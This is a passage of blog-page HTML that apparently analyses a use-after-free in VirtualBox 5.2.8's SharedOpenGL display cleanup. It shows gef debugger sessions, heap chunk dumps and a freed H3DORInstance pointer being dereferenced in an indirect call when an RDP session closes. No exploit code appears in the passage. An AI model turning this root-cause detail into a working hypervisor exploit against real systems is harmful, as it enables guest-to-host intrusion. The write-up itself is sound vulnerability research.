id=\"crayon-5b7b3e582f4fc579128644-7\"><span class=\"crayon-i\">gef<\/span>\u27a4<span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-v\">x<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">8gx<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">$<\/span><span class=\"crayon-v\">rax<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-cn\">0x10<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b7b3e582f4fc579128644-8\"><span class=\"crayon-cn\">0x7fa005b8e280<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\">\t<\/span><span class=\"crayon-cn\">0x0000000000000000<\/span><span class=\"crayon-h\">\t<\/span><span class=\"crayon-cn\">0x0000000000000035<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b7b3e582f4fc579128644-9\"><span class=\"crayon-cn\">0x7fa005b8e290<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\">\t<\/span><span class=\"crayon-cn\">0x00007fa010008070<\/span><span class=\"crayon-h\">\t<\/span><span class=\"crayon-cn\">0x00007fa005bf97f0<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b7b3e582f4fc579128644-10\"><span class=\"crayon-cn\">0x7fa005b8e2a0<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\">\t<\/span><span class=\"crayon-cn\">0x0000000000000000<\/span><span class=\"crayon-h\">\t<\/span><span class=\"crayon-cn\">0x0000029800000400<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b7b3e582f4fc579128644-11\"><span class=\"crayon-cn\">0x7fa005b8e2b0<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\">\t<\/span><span class=\"crayon-cn\">0x0000000000010101<\/span><span class=\"crayon-h\">\t<\/span><span class=\"crayon-cn\">0x0000000000000065<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b7b3e582f4fc579128644-12\"><span class=\"crayon-i\">gef<\/span>\u27a4<span class=\"crayon-h\">&nbsp;&nbsp;<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0022 seconds] -->  <\/p>\n<p>$rax-0x10 is a malloc_chunk of size 0x30 and $rax points to a H3DORInstance. You can see &#8220;w&#8221; (width) field is 0x400 and &#8220;h&#8221; (height) is 0x298 &#8211; it&#8217;s the resolution of our RDP client display. Let&#8217;s break on this place when RDP session is being closed.<\/p>\n<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-5b7b3e582f501513155149\" class=\"crayon-syntax crayon-theme-sublime-text crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> gef\u27a4  x\/5i $pc  =&gt; 0x7feffac2cdff:\tmov    rax,QWORD PTR [rax]     0x7feffac2ce02:\tmov    rdi,QWORD PTR [rdi+0x8]     0x7feffac2ce06:\tcall   QWORD PTR [rax+0x320]     0x7feffac2ce0c:\tleave       0x7feffac2ce0d:\tret      gef\u27a4  x\/8gx $rax-0x10  0x7fefed472ba0:\t0x0000000000000000\t0x0000000000000035  0x7fefed472bb0:\t0x00007fefed44c040\t0x00007fefed44e630  0x7fefed472bc0:\t0x0000000000000000\t0x0000029800000400  0x7fefed472bd0:\t0x0000000000010101\t0x0000000000001015  gef\u27a4  heap_for_ptr 0x7fefed472ba0  $2 = 0x7fefec000000  gef\u27a4  heap bins fast 0x7fefec000000  Fastbins[idx=0, size=0x10] 0x00  &#8230;  Fastbins[idx=5, size=0x60]  \u2190  &#8230;  \u2190  Chunk(addr=0x7fefed472bb0, size=0x34, flags=PREV_INUSE|NON_MAIN_ARENA) [incorrect fastbin_index]  \u2190  &#8230;  &#8230;<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-5b7b3e582f501513155149-1\">1<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b7b3e582f501513155149-2\">2<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b7b3e582f501513155149-3\">3<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b7b3e582f501513155149-4\">4<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b7b3e582f501513155149-5\">5<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b7b3e582f501513155149-6\">6<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b7b3e582f501513155149-7\">7<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b7b3e582f501513155149-8\">8<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b7b3e582f501513155149-9\">9<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b7b3e582f501513155149-10\">10<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b7b3e582f501513155149-11\">11<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b7b3e582f501513155149-12\">12<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b7b3e582f501513155149-13\">13<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b7b3e582f501513155149-14\">14<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b7b3e582f501513155149-15\">15<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b7b3e582f501513155149-16\">16<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b7b3e582f501513155149-17\">17<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b7b3e582f501513155149-18\">18<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-5b7b3e582f501513155149-1\"><span class=\"crayon-i\">gef<\/span>\u27a4<span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-v\">x<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">5i<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">$<\/span><span class=\"crayon-v\">pc<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b7b3e582f501513155149-2\"><span class=\"crayon-o\">=<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0x7feffac2cdff<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\">\t<\/span><span class=\"crayon-e\">mov&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">rax<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-e\">QWORD <\/span><span class=\"crayon-i\">PTR<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-v\">rax<\/span><span class=\"crayon-sy\">]<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b7b3e582f501513155149-3\"><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-cn\">0x7feffac2ce02<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\">\t<\/span><span class=\"crayon-e\">mov&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">rdi<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-e\">QWORD <\/span><span class=\"crayon-i\">PTR<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-v\">rdi<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-cn\">0x8<\/span><span class=\"crayon-sy\">]<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b7b3e582f501513155149-4\"><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-cn\">0x7feffac2ce06<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\">\t<\/span><span class=\"crayon-e\">call&nbsp;&nbsp; <\/span><span class=\"crayon-e\">QWORD <\/span><span class=\"crayon-i\">PTR<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-v\">rax<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-cn\">0x320<\/span><span class=\"crayon-sy\">]<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b7b3e582f501513155149-5\"><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-cn\">0x7feffac2ce0c<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\">\t<\/span><span class=\"crayon-i\">leave<\/span><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b7b3e582f501513155149-6\"><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-cn\">0x7feffac2ce0d<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\">\t<\/span><span class=\"crayon-e\">ret&nbsp;&nbsp;&nbsp;&nbsp;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b7b3e582f501513155149-7\"><span class=\"crayon-i\">gef<\/span>\u27a4<span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-v\">x<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">8gx<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">$<\/span><span class=\"crayon-v\">rax<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-cn\">0x10<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b7b3e582f501513155149-8\"><span class=\"crayon-cn\">0x7fefed472ba0<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\">\t<\/span><span class=\"crayon-cn\">0x0000000000000000<\/span><span class=\"crayon-h\">\t<\/span><span class=\"crayon-cn\">0x0000000000000035<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b7b3e582f501513155149-9\"><span class=\"crayon-cn\">0x7fefed472bb0<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\">\t<\/span><span class=\"crayon-cn\">0x00007fefed44c040<\/span><span class=\"crayon-h\">\t<\/span><span class=\"crayon-cn\">0x00007fefed44e630<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b7b3e582f501513155149-10\"><span class=\"crayon-cn\">0x7fefed472bc0<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\">\t<\/span><span class=\"crayon-cn\">0x0000000000000000<\/span><span class=\"crayon-h\">\t<\/span><span class=\"crayon-cn\">0x0000029800000400<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b7b3e582f501513155149-11\"><span class=\"crayon-cn\">0x7fefed472bd0<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\">\t<\/span><span class=\"crayon-cn\">0x0000000000010101<\/span><span class=\"crayon-h\">\t<\/span><span class=\"crayon-cn\">0x0000000000001015<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b7b3e582f501513155149-12\"><span class=\"crayon-i\">gef<\/span>\u27a4<span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-v\">heap_for<\/span><span class=\"crayon-sy\">_<\/span>ptr<span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0x7fefed472ba0<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b7b3e582f501513155149-13\"><span class=\"crayon-sy\">$<\/span><span class=\"crayon-cn\">2<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0x7fefec000000<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b7b3e582f501513155149-14\"><span class=\"crayon-i\">gef<\/span>\u27a4<span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-e\">heap <\/span><span class=\"crayon-e\">bins <\/span><span class=\"crayon-i\">fast<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0x7fefec000000<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b7b3e582f501513155149-15\"><span class=\"crayon-v\">Fastbins<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-v\">idx<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">size<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-cn\">0x10<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0x00<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b7b3e582f501513155149-16\"><span class=\"crayon-sy\">.<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-sy\">.<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b7b3e582f501513155149-17\"><span class=\"crayon-v\">Fastbins<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-v\">idx<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-cn\">5<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">size<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-cn\">0x60<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\">&nbsp;&nbsp;<\/span>\u2190<span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-h\">&nbsp;&nbsp;<\/span>\u2190<span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-e\">Chunk<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">addr<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-cn\">0x7fefed472bb0<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">size<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-cn\">0x34<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">flags<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">PREV_INUSE<\/span><span class=\"crayon-o\">|<\/span><span class=\"crayon-v\">NON_MAIN_ARENA<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-e\">incorrect <\/span><span class=\"crayon-v\">fastbin_index<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\">&nbsp;&nbsp;<\/span>\u2190<span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-sy\">.<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b7b3e582f501513155149-18\"><span class=\"crayon-sy\">.<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-sy\">.<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0045 seconds] -->  <\/p>\n<p>Memory being referenced is a freed chunk stored in fastbins. The first two qwords at $rax was replaced with malloc_chunk* fd and malloc_chunk* bk, respectively. The code takes the first qword, dereferences it and again dereferences at 0x320 offset. We need to switch to binaries compiled by ourself with symbols and disabled optimization to show what&#8217;s really pointed by the first qword at this moment.<\/p>\n<p>The next snippet is a list of displays and corresponding H3DORInstance-s at the first iteration of the loop, when no displays were freed yet.<\/p>\n<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-5b7b3e582f50b912176048\" class=\"crayon-syntax crayon-theme-sublime-text crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> Thread 43 &#8220;VDMA&#8221; hit Breakpoint 4, CrFbDisplayBase::fbCleanupRemoveAllEntries (this=0x7fb79d69aec0) at \/home\/user\/src\/VirtualBox-5.2.8\/src\/VBox\/HostServices\/SharedOpenGL\/crserverlib\/presenter\/display_base.cpp:320  320\t    while ((pEntry = CrVrScrCompositorConstIterNext(&amp;Iter)) != NULL)  gef\u27a4  pl  $1 = (CR_FRAMEBUFFER_ENTRY *) 0x7fb7ac0f4e80  $2 = (CR_FRAMEBUFFER_ENTRY *) 0x7fb7ac0f4d00  $3 = (CR_FRAMEBUFFER_ENTRY *) 0x7fb7ac0f4dc0  $4 = (CR_FRAMEBUFFER_ENTRY *) 0x7fb7ac0f4f40  $5 = (CR_FRAMEBUFFER_ENTRY *) 0x7fb7ac0f4c40  $6 = (CR_FRAMEBUFFER_ENTRY *) 0x7fb7ac0f4b80  $7 = (CR_FRAMEBUFFER_ENTRY *) 0x7fb7ac0f4a00  $8 = (CR_FRAMEBUFFER_ENTRY *) 0x7fb7ac0f4940  $9 = (CR_FRAMEBUFFER_ENTRY *) 0x7fb7ac0f4ac0  gef\u27a4  pli  $10 = (CR_FRAMEBUFFER_ENTRY *) 0x7fb7ac0f4e80  $11 = &#8220;H3DORInstance:&#8221;  0x7fb79d130260:\t0x00007fb79c0074b0\t0x00007fb79cc71ef0  0x7fb79d130270:\t0x0000000000000000\t0x0000029b00000556  0x7fb79d130280:\t0x0000000000010101  $12 = (CR_FRAMEBUFFER_ENTRY *) 0x7fb7ac0f4d00  $13 = &#8220;H3DORInstance:&#8221;  0x7fb79cc729f0:\t0x00007fb79c0074b0\t0x00007fb79d06dd40  0x7fb79cc72a00:\t0x0000000000000000\t0x0000029b00000556  0x7fb79cc72a10:\t0x0000000000010101  $14 = (CR_FRAMEBUFFER_ENTRY *) 0x7fb7ac0f4dc0  $15 = &#8220;H3DORInstance:&#8221;  0x7fb79cc81690:\t0x00007fb79c0074b0\t0x00007fb79e1d7c50  0x7fb79cc816a0:\t0x0000000000000000\t0x0000029b00000556  0x7fb79cc816b0:\t0x0000000000010101  $16 = (CR_FRAMEBUFFER_ENTRY *) 0x7fb7ac0f4f40  $17 = &#8220;H3DORInstance:&#8221;  0x7fb79d66a310:\t0x00007fb79c0074b0\t0x00007fb79cc81390  0x7fb79d66a320:\t0x0000000000000000\t0x0000029b00000556  0x7fb79d66a330:\t0x0000000000010101  $18 = (CR_FRAMEBUFFER_ENTRY *) 0x7fb7ac0f4c40  $19 = &#8220;H3DORInstance:&#8221;  0x7fb79cc67450:\t0x00007fb79c0074b0\t0x00007fb79cc7ba00  0x7fb79cc67460:\t0x0000000000000000\t0x0000029b00000556  0x7fb79cc67470:\t0x0003506100010101  $20 = (CR_FRAMEBUFFER_ENTRY *) 0x7fb7ac0f4b80  $21 = &#8220;H3DORInstance:&#8221;  0x7fb79d12dc50:\t0x00007fb79c0074b0\t0x00007fb79d12f080  0x7fb79d12dc60:\t0x0000000000000000\t0x0000029b00000556  0x7fb79d12dc70:\t0x0000000000010101  $22 = (CR_FRAMEBUFFER_ENTRY *) 0x7fb7ac0f4a00  $23 = &#8220;H3DORInstance:&#8221;  0x7fb79d66a2b0:\t0x00007fb79c0074b0\t0x00007fb79d12f330  0x7fb79d66a2c0:\t0x0000000000000000\t0x0000029b00000556  0x7fb79d66a2d0:\t0x0003506f00010101  $24 = (CR_FRAMEBUFFER_ENTRY *) 0x7fb7ac0f4940  $25 = &#8220;H3DORInstance:&#8221;  0x7fb79cf983c0:\t0x00007fb79c0074b0\t0x00007fb79cc81400  0x7fb79cf983d0:\t0x0000000000000000\t0x0000029b00000556  0x7fb79cf983e0:\t0x0000000000010101  $26 = (CR_FRAMEBUFFER_ENTRY *) 0x7fb7ac0f4ac0  $27 = &#8220;H3DORInstance:&#8221;  0x7fb79d0a7430:\t0x00007fb79c0074b0\t0x00007fb79cc814f0  0x7fb79d0a7440:\t0x0000000000000000\t0x0000029b00000556  0x7fb79d0a7450:\t0x0000000000010101<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-5b7b3e582f50b912176048-1\">1<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b7b3e582f50b912176048-2\">2<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b7b3e582f50b912176048-3\">3<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b7b3e582f50b912176048-4\">4<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b7b3e582f50b912176048-5\">5<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b7b3e582f50b912176048-6\">6<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b7b3e582f50b912176048-7\">7<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b7b3e582f50b912176048-8\">8<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b7b3e582f50b912176048-9\">9<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b7b3e582f50b912176048-10\">10<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b7b3e582f50b912176048-11\">11<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b7b3e582f50b912176048-12\">12<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b7b3e582f50b912176048-13\">13<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b7b3e582f50b912176048-14\">14<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b7b3e582f50b912176048-15\">15<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b7b3e582f50b912176048-16\">16<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b7b3e582f50b912176048-17\">17<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b7b3e582f50b912176048-18\">18<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b7b3e582f50b912176048-19\">19<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b7b3e582f50b912176048-20\">20<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b7b3e582f50b912176048-21\">21<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b7b3e582f50b912176048-22\">22<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b7b3e582f50b912176048-23\">23<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b7b3e582f50b912176048-24\">24<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b7b3e582f50b912176048-25\">25<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b7b3e582f50b912176048-26\">26<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b7b3e582f50b912176048-27\">27<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b7b3e582f50b912176048-28\">28<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b7b3e582f50b912176048-29\">29<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b7b3e582f50b912176048-30\">30<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b7b3e582f50b912176048-31\">31<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b7b3e582f50b912176048-32\">32<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b7b3e582f50b912176048-33\">33<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b7b3e582f50b912176048-34\">34<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b7b3e582f50b912176048-35\">35<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b7b3e582f50b912176048-36\">36<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b7b3e582f50b912176048-37\">37<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b7b3e582f50b912176048-38\">38<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b7b3e582f50b912176048-39\">39<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b7b3e582f50b912176048-40\">40<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b7b3e582f50b912176048-41\">41<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b7b3e582f50b912176048-42\">42<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b7b3e582f50b912176048-43\">43<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b7b3e582f50b912176048-44\">44<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b7b3e582f50b912176048-45\">45<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b7b3e582f50b912176048-46\">46<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b7b3e582f50b912176048-47\">47<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b7b3e582f50b912176048-48\">48<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b7b3e582f50b912176048-49\">49<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b7b3e582f50b912176048-50\">50<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b7b3e582f50b912176048-51\">51<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b7b3e582f50b912176048-52\">52<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b7b3e582f50b912176048-53\">53<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b7b3e582f50b912176048-54\">54<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b7b3e582f50b912176048-55\">55<\/div>\n<div class=\"crayon-num crayon-striped-num\" 